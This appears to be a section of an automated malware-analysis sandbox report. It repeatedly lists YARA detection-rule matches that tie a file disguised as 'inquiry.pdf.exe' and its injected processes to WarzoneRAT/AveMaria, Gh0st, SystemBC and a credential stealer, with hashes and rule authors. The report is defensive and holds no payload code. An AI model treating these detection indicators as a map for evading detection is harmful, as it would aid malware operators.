            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea6d50.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea71c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea71c8.10.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 18.2.glonkjhg.exe.3c8c5ea.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.e95278.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 18.2.glonkjhg.exe.3d7a30a.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea6d50.9.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 20.3.AddInProcess32.exe.ea6d50.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 20.3.AddInProcess32.exe.ea6d50.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.inquiry.pdf.exe.3b7d642.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
            Source: 0.2.inquiry.pdf.exe.3c4e6f2.6.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.inquiry.pdf.exe.3b9a2b2.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
